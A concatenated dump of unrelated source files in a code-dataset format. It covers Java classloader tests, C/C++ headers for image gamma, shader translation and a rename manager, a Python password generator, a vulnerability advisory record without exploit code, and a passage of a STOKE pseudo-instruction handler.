    assertTrue(resource.toString(), resource.toString().endsWith("default-package-resource.jar!/package/re%20source++.txt"));
    URLConnection connection = resource.openConnection();
    assertEquals(7, connection.getContentLength());
    assertTrue(connection instanceof JarURLConnection);
    JarURLConnection jarConnection = (JarURLConnection) connection;
    assertEquals("package/re source++.txt", jarConnection.getEntryName());
    assertEquals(Utilities.toURI(moduleJar).toURL(), jarConnection.getJarFileURL());
    assertEquals("bar", jarConnection.getMainAttributes().getValue("foo"));
    assertEquals(moduleJar.getAbsolutePath(), jarConnection.getJarFile().getName());
}
/** #196595: a resource URL produced by JarClassLoader must hand back its defining
 * classloader through URL.getContent(new Class&lt;?&gt;[] {ClassLoader.class}). */
public void testResourceDefinition() throws Exception {
    File someJar = new File(getWorkDir(), "some.jar");
    TestFileUtils.writeZipFile(someJar, "package/resource.txt:content");
    ClassLoader definingLoader = new JarClassLoader(Collections.singletonList(someJar), new ProxyClassLoader[0]);
    URL resource = definingLoader.getResource("package/resource.txt");
    assertNotNull(resource);
    assertStreamContent(resource.openStream(), "content");
    // The URL must identify which loader defined it.
    assertEquals(definingLoader, resource.getContent(new Class<?>[] {ClassLoader.class}));
}
// Verifies that META-INF/services lookup resolves the implementation class against
// the classloader that defined the services file's URL (obtained via
// URL.getContent(ClassLoader.class), see testResourceDefinition), not against the
// first loader in the proxy chain that happens to know the class name.
public void testMetaInfServicesUsesGetContentCL() throws Exception {
final ClassLoader parent = MetaInfServicesToken.class.getClassLoader().getParent();
// Delegates everything to the JDK-level parent so that the two URLClassLoaders
// below each define their OWN copy of MetaInfServicesToken (no shared parent copy).
class JDKOnly extends ClassLoader {
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
return parent.loadClass(name);
}
@Override
protected synchronized Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
return parent.loadClass(name);
}
@Override
public URL getResource(String name) {
return parent.getResource(name);
}
@Override
public InputStream getResourceAsStream(String name) {
return parent.getResourceAsStream(name);
}
@Override
public Enumeration<URL> getResources(String name) throws IOException {
return parent.getResources(name);
}
}
ClassLoader jdkonly = new JDKOnly();
// The services file names MetaInfServicesToken as a java.io.Serializable provider.
File jar = new File(getWorkDir(), "some.jar");
TestFileUtils.writeZipFile(
jar,
"META-INF/services/java.io.Serializable:org.netbeans.MetaInfServicesToken"
);
URL url = MetaInfServicesToken.class.getProtectionDomain().getCodeSource().getLocation();
// Two sibling loaders over the same codebase -> two distinct Class objects.
URLClassLoader one = new URLClassLoader(new URL[] { url }, jdkonly);
URLClassLoader two = new URLClassLoader(new URL[] { url }, jdkonly);
final String name = MetaInfServicesToken.class.getName();
Class<?> cOne = one.loadClass(name);
Class<?> cTwo = two.loadClass(name);
if (cOne == cTwo) {
fail("Classes should be different, not loaded by: " + cOne.getClassLoader());
}
// The services file lives in 'jar', whose JarClassLoader has 'two' as parent;
// 'one' is consulted first by the proxy but must NOT win the class resolution.
ClassLoader cl = new JarClassLoader(Collections.singletonList(jar), new ClassLoader[] { two });
ProxyClassLoader all = new ProxyClassLoader(new ClassLoader[] { one, cl }, false);
Object res = Lookups.metaInfServices(all).lookup(Serializable.class);
assertNotNull("One serializable found", res);
assertEquals("It is from the second classloader", cTwo, res.getClass());
}
/** Asserts the enumeration yields exactly one URL per expected content string,
 * in order, and nothing more. */
private void assertURLsContent(Enumeration<URL> urls, String ... contents) throws IOException {
    int index = 0;
    while (index < contents.length) {
        assertTrue("Enough entries", urls.hasMoreElements());
        assertStreamContent(urls.nextElement().openStream(), contents[index]);
        index++;
    }
    assertFalse("Too many entries", urls.hasMoreElements());
}
/**
 * Asserts that {@code str} is non-null and that its first {@code content.length()}
 * bytes decode to exactly {@code content}. The stream is always closed.
 */
private void assertStreamContent(InputStream str, String content) throws IOException {
    assertNotNull("Resource found", str);
    byte[] data = new byte[content.length()];
    DataInputStream dis = new DataInputStream(str);
    try {
        dis.readFully(data);
    } finally {
        dis.close();
    }
    // Fix: JUnit's convention is assertEquals(expected, actual) -- the original
    // had them swapped, which produces misleading failure messages.  Decode with
    // an explicit charset so the check does not depend on the platform default.
    assertEquals(content, new String(data, "UTF-8"));
}
// Shared scenario for the two interruption tests: two threads race to resolve a
// resource from a JarClassLoader whose jar is closed; one thread actually opens
// the jar (and is stalled inside a read by BlockingSecurityManager), the other
// waits for the first.  The thread at index 'toInterrupt' is interrupted mid-wait;
// BOTH must still end up with a valid URL rather than an exception.
public void interruptImpl(int toInterrupt) throws Exception {
File jar = new File(getWorkDir(), "interrupted-reading.jar");
TestFileUtils.writeZipFile(jar, "resource.txt:content");
final JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
jcl.releaseJars();
// Now we have a JarClassLoader with no jars open; catch it in the act of
// (re)opening the jar.
final Semaphore controlSemaphore = new Semaphore(0);
final Object[] results = new Object[2];
Semaphore readSemaphore = new Semaphore(0);
// Every read of this jar file will block until readSemaphore is released.
BlockingSecurityManager.initialize(jar.toString(), readSemaphore);
class Tester extends Thread {
int slot;
Tester(int slot) throws Exception {
this.slot = slot;
start();
// Constructor returns only after the thread has started running.
controlSemaphore.acquire();
}
public void run() {
controlSemaphore.release(); // we're about to start blocking
try {
URL url = jcl.getResource("resource.txt");
assertNotNull(url);
results[slot] = url;
} catch (Throwable t) {
// Stored so the main thread can report an assertion failure below.
results[slot] = t;
}
}
};
Thread[] threads = new Thread[] { new Tester(0), new Tester(1) };
// threads[0] has reached the blocking point while opening the jar
// threads[1] is blocking in callGet()
Thread.sleep(100); // for sure
threads[toInterrupt].interrupt(); // interrupt the selected thread
readSemaphore.release(1000); // let the read proceed
// wait for them to finish the work
for (Thread t : threads) t.join();
assertTrue("Should be URL: " + results[0], results[0] instanceof URL);
assertTrue("Should be URL: " + results[1], results[1] instanceof URL);
}
// Interrupting the thread that is physically opening the jar must not break
// resource resolution for either waiter.
public void testCanInterruptOpeningThread() throws Exception {
interruptImpl(0); // try interrupting the opening thread
}
// Interrupting the thread that is merely waiting for the jar to be opened must
// not break resource resolution for either waiter.
public void testCanInterruptWaitingThread() throws Exception {
interruptImpl(1); // try interrupting the waiting thread
}
// Test harness: a SecurityManager that stalls every file read of one specific
// path on a semaphore, letting the test freeze a thread exactly while it opens
// the jar.  State is static because the JVM holds a single global manager;
// initialize() installs it at most once and just retargets path/semaphore after.
private static class BlockingSecurityManager extends SecurityManager {
// Absolute path of the file whose reads should block.
private static String path;
// Released by the test to let blocked reads proceed.
private static Semaphore sync;
public static void initialize(String path, Semaphore sync) {
BlockingSecurityManager.path = path;
BlockingSecurityManager.sync = sync;
if (System.getSecurityManager() instanceof BlockingSecurityManager) {
// ok
} else {
System.setSecurityManager(new BlockingSecurityManager());
}
}
public @Override void checkRead(String file) {
if (file.equals(path)) {
// Uninterruptibly: the test interrupts threads and still expects the
// read to complete once the semaphore is released.
sync.acquireUninterruptibly();
}
}
public @Override void checkRead(String file, Object context) {
checkRead(file);
}
// All other permission checks are allowed unconditionally.
public @Override void checkPermission(Permission perm) {}
public @Override void checkPermission(Permission perm, Object ctx) {}
}
}
| 7,298 |
855 | // Copyright 2017 Google Inc. All Rights Reserved.
//
// Use of this source code is governed by an MIT-style
// license that can be found in the LICENSE file or at
// https://opensource.org/licenses/MIT.
#ifndef PIK_GAMMA_CORRECT_H_
#define PIK_GAMMA_CORRECT_H_
// Deprecated: sRGB transfer function. Use color_management.h instead.
#include <cmath>
#include "pik/compiler_specific.h"
namespace pik {
// Values are in [0, 255].
// sRGB-encoded -> linear light, both on a [0, 255] scale; out-of-range input
// clamps to the nearest endpoint.
static PIK_INLINE double Srgb8ToLinearDirect(double srgb8) {
  if (srgb8 <= 0.0) return 0.0;
  if (srgb8 >= 255.0) return 255.0;
  // Below the knee the transfer curve is a straight line through the origin.
  if (srgb8 <= 10.31475) return srgb8 / 12.92;
  // Power-law segment, evaluated on the normalized [0, 1] scale.
  const double normalized = srgb8 / 255.0;
  const double linear_normalized = std::pow((normalized + 0.055) / 1.055, 2.4);
  return linear_normalized * 255.0;
}
// Values are in [0, 255].
// Linear light -> sRGB-encoded (inverse of Srgb8ToLinearDirect), both on a
// [0, 255] scale; out-of-range input clamps to the nearest endpoint.
static PIK_INLINE double LinearToSrgb8Direct(double linear) {
  if (linear >= 255.0) return 255.0;
  if (linear <= 0.0) return 0.0;
  // Linear segment near black (same knee as the forward transform).
  if (linear <= 10.31475 / 12.92) return linear * 12.92;
  // Inverse power-law segment, evaluated on the normalized [0, 1] scale.
  const double normalized = linear / 255.0;
  const double encoded = std::pow(normalized, 1.0 / 2.4) * 1.055 - 0.055;
  return encoded * 255.0;
}
} // namespace pik
#endif // PIK_GAMMA_CORRECT_H_
| 451 |
562 | #include <librttopo.h>
#include <stdio.h>
/* Prints the librttopo version string and exits 0.
 * NOTE(review): looks like a build-system probe verifying that the librttopo
 * headers and the rtgeom_version() symbol are available -- confirm. */
int main(void) {
printf("%s\n", rtgeom_version());
return 0;
}
| 57 |
14,668 | // Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "sql/sql_memory_dump_provider.h"
#include "base/trace_event/memory_dump_manager.h"
#include "base/trace_event/process_memory_dump.h"
#include "third_party/sqlite/sqlite3.h"
namespace sql {
// static
// Returns the process-wide provider.  LeakySingletonTraits: the instance is
// intentionally never destroyed, so it stays usable for late memory dumps.
SqlMemoryDumpProvider* SqlMemoryDumpProvider::GetInstance() {
return base::Singleton<
SqlMemoryDumpProvider,
base::LeakySingletonTraits<SqlMemoryDumpProvider>>::get();
}
SqlMemoryDumpProvider::SqlMemoryDumpProvider() = default;
SqlMemoryDumpProvider::~SqlMemoryDumpProvider() = default;
// Reports SQLite's global memory statistics into the process memory dump.
// Returns false (dump aborted) only if the primary SQLITE_STATUS_MEMORY_USED
// query fails; the malloc-count query is best-effort.
bool SqlMemoryDumpProvider::OnMemoryDump(
const base::trace_event::MemoryDumpArgs& args,
base::trace_event::ProcessMemoryDump* pmd) {
sqlite3_int64 memory_used = 0;
sqlite3_int64 memory_high_water = 0;
// resetFlag=1: the high-water mark is reset after this read, so each dump
// reports the peak since the previous dump.
int status = sqlite3_status64(SQLITE_STATUS_MEMORY_USED, &memory_used,
&memory_high_water, /* resetFlag= */ 1);
if (status != SQLITE_OK)
return false;
base::trace_event::MemoryAllocatorDump* dump =
pmd->CreateAllocatorDump("sqlite");
dump->AddScalar(base::trace_event::MemoryAllocatorDump::kNameSize,
base::trace_event::MemoryAllocatorDump::kUnitsBytes,
memory_used);
dump->AddScalar("malloc_high_wmark_size",
base::trace_event::MemoryAllocatorDump::kUnitsBytes,
memory_high_water);
// Outstanding allocation count; emitted only if supported/successful.
sqlite3_int64 dummy_high_water = -1;
sqlite3_int64 malloc_count = -1;
status = sqlite3_status64(SQLITE_STATUS_MALLOC_COUNT, &malloc_count,
&dummy_high_water, /* resetFlag= */ 0);
if (status == SQLITE_OK) {
dump->AddScalar("malloc_count",
base::trace_event::MemoryAllocatorDump::kUnitsObjects,
malloc_count);
}
// Attribute these bytes to the system allocator pool to avoid double counting.
const char* system_allocator_name =
base::trace_event::MemoryDumpManager::GetInstance()
->system_allocator_pool_name();
if (system_allocator_name) {
pmd->AddSuballocation(dump->guid(), system_allocator_name);
}
return true;
}
} // namespace sql
| 910 |
1,026 | <filename>Random_Password_Generator/PasswordGenerator.py
import random  # retained so the module's import surface is unchanged; generation now uses `secrets`
import secrets

# Character pool for generated passwords: lowercase, uppercase, digits, punctuation.
# Fix: the original pool contained "[]{]" -- the second "]" was evidently a typo
# for "}", so "}" could never appear in a password.
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-=_+`~[]{}\\|;:,<.>/?'

welcomeMessage = "Welcome to the Password Generator!"
detailsMessage = "This program will generate a secure password using a random arrangement of letters (CAPS ON & caps off), numbers, and punctuations."
creatorMessage = "Created by <NAME> on October 3rd, 2018."


def generate_password(length):
    """Return a password of `length` characters drawn uniformly from `chars`.

    Fix: uses `secrets.choice` instead of `random.choice` -- the `random`
    module's PRNG is not suitable for security-sensitive values like passwords.
    """
    return ''.join(secrets.choice(chars) for _ in range(length))


def main():
    """Interactive loop: prompt for a count and length, print the passwords and
    mirror them into Passwords.txt, until the user answers 'N'."""
    print(welcomeMessage + '\n' + detailsMessage + '\n' + creatorMessage + '\n')
    while True:
        # int() raises ValueError on non-numeric input, same as the original.
        passwordNum = int(input('How many passwords would you like to generate? '))
        passwordLength = int(input('How long will the password(s) be? '))
        print('\n')
        print('Here are your password(s): \n')
        # 'with' guarantees the file is closed even if printing raises
        # (the original leaked the handle on an exception mid-loop).
        with open('Passwords.txt', 'w') as passwordFile:
            for _ in range(passwordNum):
                password = generate_password(passwordLength)
                print(password)
                passwordFile.write(password + '\n')
        print('\n')
        again = None
        while again is None:
            getContinue = input('Do you want to use the Password Generator again? (Y/N)')
            print('\n')
            if getContinue in ('Y', 'y'):
                again = True
                print('\n')
            elif getContinue in ('N', 'n'):
                again = False
            else:
                print("Please enter 'Y' or 'N.'\n")
                print('\n')
        if not again:
            break
    print('Thank you for using the Password Generator. Have a nice day!')


# Guarded so importing the module (e.g. to reuse generate_password) does not
# start the interactive prompt; running it as a script behaves as before.
if __name__ == '__main__':
    main()
| 895 |
1,461 | // Copyright (c) The HLSL2GLSLFork Project Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE.txt file.
#pragma once
#include <string>
#include "hlsl2glsl.h"
namespace hlslang {
namespace MetalCodeGen {
/// Generic opaque handle. This type is used for handles to the parser/translator.
/// If handle creation fails, 0 will be returned.
class MslCrossCompiler;
}} // namespace
typedef hlslang::MetalCodeGen::MslCrossCompiler* MetalShHandle;
/// Initialize the HLSL2GLSL translator. This function must be called once prior to calling any other
/// HLSL2GLSL translator functions
/// \return
/// 1 on success, 0 on failure
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_Initialize();
/// Shutdown the HLSL2GLSL translator. This function should be called to de-initialize the HLSL2GLSL
/// translator and should only be called once on shutdown.
SH_IMPORT_EXPORT void C_DECL Hlsl2Msl_Shutdown();
/// Construct a compiler for the given language (one per shader)
SH_IMPORT_EXPORT MetalShHandle C_DECL Hlsl2Msl_ConstructCompiler( const EShLanguage language );
/// Destroy a compiler previously created with Hlsl2Msl_ConstructCompiler.
SH_IMPORT_EXPORT void C_DECL Hlsl2Msl_DestructCompiler( MetalShHandle handle );
/// Parse HLSL shader to prepare it for final translation.
/// Must be called before Hlsl2Msl_Translate on the same handle.
/// \param callbacks
/// File read callback for #include processing. If NULL is passed, then #include directives will result in error.
/// \param options
/// Flags of TTranslateOptions
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_Parse(
const MetalShHandle handle,
const char* shaderString,
ETargetVersion targetVersion,
Hlsl2Glsl_ParseCallbacks* callbacks,
unsigned options);
/// After parsing a HLSL shader, do the final translation to GLSL.
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_Translate(
const MetalShHandle handle,
const char* entry,
ETargetVersion targetVersion,
unsigned options);
/// After translating HLSL shader(s), retrieve the translated GLSL source.
SH_IMPORT_EXPORT const char* C_DECL Hlsl2Msl_GetShader( const MetalShHandle handle );
/// Retrieve parser/translator diagnostics for the given compiler handle.
SH_IMPORT_EXPORT const char* C_DECL Hlsl2Msl_GetInfoLog( const MetalShHandle handle );
/// After translating, retrieve the number of uniforms
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_GetUniformCount( const MetalShHandle handle );
/// After translating, retrieve the uniform info table
SH_IMPORT_EXPORT const ShUniformInfo* C_DECL Hlsl2Msl_GetUniformInfo( const MetalShHandle handle );
/// Instead of mapping HLSL attributes to GLSL fixed-function attributes, this function can be used to
/// override the attribute mapping. This tells the code generator to use user-defined attributes for
/// the semantics that are specified.
///
/// \param handle
/// Handle to the compiler. This should be called BEFORE calling Hlsl2Msl_Translate
/// \param pSemanticEnums
/// Array of semantic enums to set
/// \param pSemanticNames
/// Array of user attribute names to use
/// \param nNumSemantics
/// Number of semantics to set in the arrays
/// \return
/// 1 on success, 0 on failure
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_SetUserAttributeNames ( MetalShHandle handle,
const EAttribSemantic *pSemanticEnums,
const char *pSemanticNames[],
int nNumSemantics );
/// Reports whether the given target version uses precision qualifiers.
SH_IMPORT_EXPORT bool C_DECL Hlsl2Msl_VersionUsesPrecision (ETargetVersion version);
| 1,234 |
347 | #pragma once
#include <vector>
#include <map>
#include "srwlock.h"
// Coordinates the Smart Rename operation: holds the set of items to rename,
// fans regex updates out to registered event listeners, and drives two worker
// threads -- one that applies the regex to every item, and one that performs
// the actual file rename via the shell.  Also listens to regex-change events
// so edits to search/replace terms re-trigger the regex pass.
class CSmartRenameManager :
public ISmartRenameManager,
public ISmartRenameRegExEvents
{
public:
// IUnknown
IFACEMETHODIMP QueryInterface(_In_ REFIID iid, _Outptr_ void** resultInterface);
IFACEMETHODIMP_(ULONG) AddRef();
IFACEMETHODIMP_(ULONG) Release();
// ISmartRenameManager
IFACEMETHODIMP Advise(_In_ ISmartRenameManagerEvents* renameOpEvent, _Out_ DWORD *cookie);
IFACEMETHODIMP UnAdvise(_In_ DWORD cookie);
IFACEMETHODIMP Start();
IFACEMETHODIMP Stop();
IFACEMETHODIMP Reset();
IFACEMETHODIMP Shutdown();
IFACEMETHODIMP Rename(_In_ HWND hwndParent);
IFACEMETHODIMP AddItem(_In_ ISmartRenameItem* pItem);
IFACEMETHODIMP GetItemByIndex(_In_ UINT index, _COM_Outptr_ ISmartRenameItem** ppItem);
IFACEMETHODIMP GetItemById(_In_ int id, _COM_Outptr_ ISmartRenameItem** ppItem);
IFACEMETHODIMP GetItemCount(_Out_ UINT* count);
IFACEMETHODIMP GetSelectedItemCount(_Out_ UINT* count);
IFACEMETHODIMP GetRenameItemCount(_Out_ UINT* count);
IFACEMETHODIMP get_flags(_Out_ DWORD* flags);
IFACEMETHODIMP put_flags(_In_ DWORD flags);
IFACEMETHODIMP get_renameRegEx(_COM_Outptr_ ISmartRenameRegEx** ppRegEx);
IFACEMETHODIMP put_renameRegEx(_In_ ISmartRenameRegEx* pRegEx);
IFACEMETHODIMP get_renameItemFactory(_COM_Outptr_ ISmartRenameItemFactory** ppItemFactory);
IFACEMETHODIMP put_renameItemFactory(_In_ ISmartRenameItemFactory* pItemFactory);
// ISmartRenameRegExEvents -- re-runs the regex pass when terms/flags change.
IFACEMETHODIMP OnSearchTermChanged(_In_ PCWSTR searchTerm);
IFACEMETHODIMP OnReplaceTermChanged(_In_ PCWSTR replaceTerm);
IFACEMETHODIMP OnFlagsChanged(_In_ DWORD flags);
// Factory: the only supported way to create an instance (ctor is protected).
static HRESULT s_CreateInstance(_Outptr_ ISmartRenameManager** ppsrm);
protected:
CSmartRenameManager();
virtual ~CSmartRenameManager();
HRESULT _Init();
void _Cleanup();
void _Cancel();
// Listener notification helpers.
void _OnItemAdded(_In_ ISmartRenameItem* renameItem);
void _OnUpdate(_In_ ISmartRenameItem* renameItem);
void _OnError(_In_ ISmartRenameItem* renameItem);
void _OnRegExStarted(_In_ DWORD threadId);
void _OnRegExCanceled(_In_ DWORD threadId);
void _OnRegExCompleted(_In_ DWORD threadId);
void _OnRenameStarted();
void _OnRenameCompleted();
void _ClearEventHandlers();
void _ClearSmartRenameItems();
static DWORD _GetDefaultFileOpFlags();
HRESULT _PerformRegExRename();
HRESULT _PerformFileOperation();
HRESULT _CreateRegExWorkerThread();
void _CancelRegExWorkerThread();
void _WaitForRegExWorkerThread();
HRESULT _CreateFileOpWorkerThread();
HRESULT _EnsureRegEx();
HRESULT _InitRegEx();
void _ClearRegEx();
// Thread proc for performing the regex rename of each item
static DWORD WINAPI s_regexWorkerThread(_In_ void* pv);
// Thread proc for performing the actual file operation that does the file rename
static DWORD WINAPI s_fileOpWorkerThread(_In_ void* pv);
static LRESULT CALLBACK s_msgWndProc(_In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam);
LRESULT _WndProc(_In_ HWND hwnd, _In_ UINT msg, _In_ WPARAM wParam, _In_ LPARAM lParam);
// Worker-thread handles and the manual events that start/cancel them.
HANDLE m_regExWorkerThreadHandle = nullptr;
HANDLE m_startRegExWorkerEvent = nullptr;
HANDLE m_cancelRegExWorkerEvent = nullptr;
HANDLE m_fileOpWorkerThreadHandle = nullptr;
HANDLE m_startFileOpWorkerEvent = nullptr;
// Separate locks: listener list vs. item map (see _Guarded_by_ below).
CSRWLock m_lockEvents;
CSRWLock m_lockItems;
DWORD m_flags = 0;
DWORD m_cookie = 0;
DWORD m_regExAdviseCookie = 0;
// One registered listener plus the cookie handed back from Advise().
struct RENAME_MGR_EVENT
{
ISmartRenameManagerEvents* pEvents;
DWORD cookie;
};
CComPtr<ISmartRenameItemFactory> m_spItemFactory;
CComPtr<ISmartRenameRegEx> m_spRegEx;
_Guarded_by_(m_lockEvents) std::vector<RENAME_MGR_EVENT> m_renameManagerEvents;
_Guarded_by_(m_lockItems) std::map<int, ISmartRenameItem*> m_renameItems;
// Parent HWND used by IFileOperation
HWND m_hwndParent = nullptr;
HWND m_hwndMessage = nullptr;
CRITICAL_SECTION m_critsecReentrancy;
long m_refCount;
};
634 | <gh_stars>100-1000
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.ui;
import com.intellij.openapi.application.Application;
import org.intellij.lang.annotations.JdkConstants;
import javax.annotation.Nonnull;
import java.awt.*;
/**
* @author egor
*/
public interface SuitableFontProvider {
// Looks up the application-level implementation from the service container.
@Nonnull
static SuitableFontProvider getInstance() {
return Application.get().getInstance(SuitableFontProvider.class);
}
// Returns a font of the given size/style able to display character 'c';
// presumably falls back from defaultFontFamily -- confirm with implementations.
Font getFontAbleToDisplay(char c, int size, @JdkConstants.FontStyle int style, @Nonnull String defaultFontFamily);
}
| 325 |
892 | <filename>advisories/unreviewed/2022/05/GHSA-x5hg-q2vc-mxfh/GHSA-x5hg-q2vc-mxfh.json
{
"schema_version": "1.2.0",
"id": "GHSA-x5hg-q2vc-mxfh",
"modified": "2022-05-12T00:01:28Z",
"published": "2022-05-12T00:01:28Z",
"aliases": [
"CVE-2021-26372"
],
"details": "Insufficient bound checks related to PCIE in the System Management Unit (SMU) may result in access to an invalid address space that could result in denial of service.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26372"
},
{
"type": "WEB",
"url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1027"
},
{
"type": "WEB",
"url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1028"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": null,
"github_reviewed": false
}
} | 447 |
460 | <gh_stars>100-1000
#include "../../tools/qmeegographicssystemhelper/qmeegoswitchevent.h"
| 37 |
645 | // Copyright 2013-2015 Stanford University
//
// Licensed under the Apache License, Version 2.0 (the License);
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an AS IS BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include <regex>
#include "src/validator/handlers/pseudo_handler.h"
using namespace stoke;
using namespace x64asm;
using namespace std;
// Label patterns recognized by this handler; indices are referenced by number
// in build_circuit(), so the order here must not change.
const vector<string> PseudoHandler::supported_regex_ = {
"^\\.move_([0-9]{3})_([0-9]{3})_([^_]*)_([^_]*)_([^_]*)$",  // [0] gp split/join move
"^\\.set_(af|of|sf|zf|cf|pf)$",  // [1] set a flag to 1
"^\\.clear_(af|of|sf|zf|cf|pf)$",  // [2] clear a flag to 0
"^\\.set_szp_for_(.*)$",  // [3] set SF/ZF/PF from a register value
"^\\.read_(af|of|sf|zf|cf|pf)_into_([^_]*)$",  // [4] read a flag into a gp register
"^\\.move_byte_([0-9]+)_of_([^_]*)_to_([^_]*)$",  // [5] extract byte i of a register
"^\\.move_([^_]*)_to_byte_([0-9]+)_of_([^_]*)$",  // [6] insert a register into byte i
"^\\.write_([^_]*)_to_(af|of|sf|zf|cf|pf)$",  // [7] write a flag from bit 0 of a register
"^\\.move_(128|032)_(128|032)_([^_]*)_([^_]*)_([^_]*)_([^_]*)_([^_]*)$",  // [8] 4-way 128<->32 vector split/join
"^\\.move_(128|64)_(128|64)_([^_]*)_([^_]*)_([^_]*)$",  // [9] 2-way 128<->64 vector split/join
};
// Flag-name token (as it appears in the label text) -> eflags constant.
// Note: file-scope constants, not class members, despite the trailing '_'.
const map<string, Eflags> eflag_map_ = {
{"of", Constants::eflags_of()},
{"zf", Constants::eflags_zf()},
{"sf", Constants::eflags_sf()},
{"af", Constants::eflags_af()},
{"pf", Constants::eflags_pf()},
{"cf", Constants::eflags_cf()},
};
// Register-name token -> x64asm operand, covering 8/16/32/64-bit gp registers
// plus xmm/ymm.  Label decoding in build_circuit() looks register names up here.
const map<string, Operand> reg_map_ = {
{"al", Constants::al()},
{"cl", Constants::cl()},
{"dl", Constants::dl()},
{"bl", Constants::bl()},
{"ah", Constants::ah()},
{"ch", Constants::ch()},
{"dh", Constants::dh()},
{"bh", Constants::bh()},
{"spl", Constants::spl()},
{"bpl", Constants::bpl()},
{"sil", Constants::sil()},
{"dil", Constants::dil()},
{"r8b", Constants::r8b()},
{"r9b", Constants::r9b()},
{"r10b", Constants::r10b()},
{"r11b", Constants::r11b()},
{"r12b", Constants::r12b()},
{"r13b", Constants::r13b()},
{"r14b", Constants::r14b()},
{"r15b", Constants::r15b()},
{"ax", Constants::ax()},
{"cx", Constants::cx()},
{"dx", Constants::dx()},
{"bx", Constants::bx()},
{"sp", Constants::sp()},
{"bp", Constants::bp()},
{"si", Constants::si()},
{"di", Constants::di()},
{"r8w", Constants::r8w()},
{"r9w", Constants::r9w()},
{"r10w", Constants::r10w()},
{"r11w", Constants::r11w()},
{"r12w", Constants::r12w()},
{"r13w", Constants::r13w()},
{"r14w", Constants::r14w()},
{"r15w", Constants::r15w()},
{"eax", Constants::eax()},
{"ecx", Constants::ecx()},
{"edx", Constants::edx()},
{"ebx", Constants::ebx()},
{"esp", Constants::esp()},
{"ebp", Constants::ebp()},
{"esi", Constants::esi()},
{"edi", Constants::edi()},
{"r8d", Constants::r8d()},
{"r9d", Constants::r9d()},
{"r10d", Constants::r10d()},
{"r11d", Constants::r11d()},
{"r12d", Constants::r12d()},
{"r13d", Constants::r13d()},
{"r14d", Constants::r14d()},
{"r15d", Constants::r15d()},
{"rax", Constants::rax()},
{"rcx", Constants::rcx()},
{"rdx", Constants::rdx()},
{"rbx", Constants::rbx()},
{"rsp", Constants::rsp()},
{"rbp", Constants::rbp()},
{"rsi", Constants::rsi()},
{"rdi", Constants::rdi()},
{"r8", Constants::r8()},
{"r9", Constants::r9()},
{"r10", Constants::r10()},
{"r11", Constants::r11()},
{"r12", Constants::r12()},
{"r13", Constants::r13()},
{"r14", Constants::r14()},
{"r15", Constants::r15()},
{"xmm0", Constants::xmm0()},
{"xmm1", Constants::xmm1()},
{"xmm2", Constants::xmm2()},
{"xmm3", Constants::xmm3()},
{"xmm4", Constants::xmm4()},
{"xmm5", Constants::xmm5()},
{"xmm6", Constants::xmm6()},
{"xmm7", Constants::xmm7()},
{"xmm8", Constants::xmm8()},
{"xmm9", Constants::xmm9()},
{"xmm10", Constants::xmm10()},
{"xmm11", Constants::xmm11()},
{"xmm12", Constants::xmm12()},
{"xmm13", Constants::xmm13()},
{"xmm14", Constants::xmm14()},
{"xmm15", Constants::xmm15()},
{"ymm0", Constants::ymm0()},
{"ymm1", Constants::ymm1()},
{"ymm2", Constants::ymm2()},
{"ymm3", Constants::ymm3()},
{"ymm4", Constants::ymm4()},
{"ymm5", Constants::ymm5()},
{"ymm6", Constants::ymm6()},
{"ymm7", Constants::ymm7()},
{"ymm8", Constants::ymm8()},
{"ymm9", Constants::ymm9()},
{"ymm10", Constants::ymm10()},
{"ymm11", Constants::ymm11()},
{"ymm12", Constants::ymm12()},
{"ymm13", Constants::ymm13()},
{"ymm14", Constants::ymm14()},
{"ymm15", Constants::ymm15()},
};
// Reports whether 'instr' is a pseudo instruction this handler models:
// a CALL to a label whose text matches one of the supported patterns.
Handler::SupportLevel PseudoHandler::get_support(const Instruction& instr) {
  if (instr.get_opcode() != CALL_LABEL) {
    return SupportLevel::NONE;
  }
  const auto label_text = instr.get_operand<Label>(0).get_text();
  for (const auto& pattern : supported_regex_) {
    if (regex_match(label_text, regex(pattern))) {
      return (Handler::SupportLevel)(SupportLevel::BASIC | SupportLevel::CEG);
    }
  }
  return SupportLevel::NONE;
}
/** Symbolically executes one pseudo instruction (a CALL to a specially named
 * label) against the symbolic state 'ss'.  The label text is decoded against
 * the patterns in supported_regex_ and the matching transformation is applied:
 * register split/join moves, flag set/clear/read/write, SZP-flag updates, and
 * byte extract/insert.  Sets error_ and leaves 'ss' untouched on unsupported
 * input.  Fix vs. original: the unreachable fallthrough at the end recorded
 * nothing and printed the label to stdout; it now stores a diagnostic in
 * error_ instead. */
void PseudoHandler::build_circuit(const Instruction& instr, SymState& ss) {
  error_ = "";
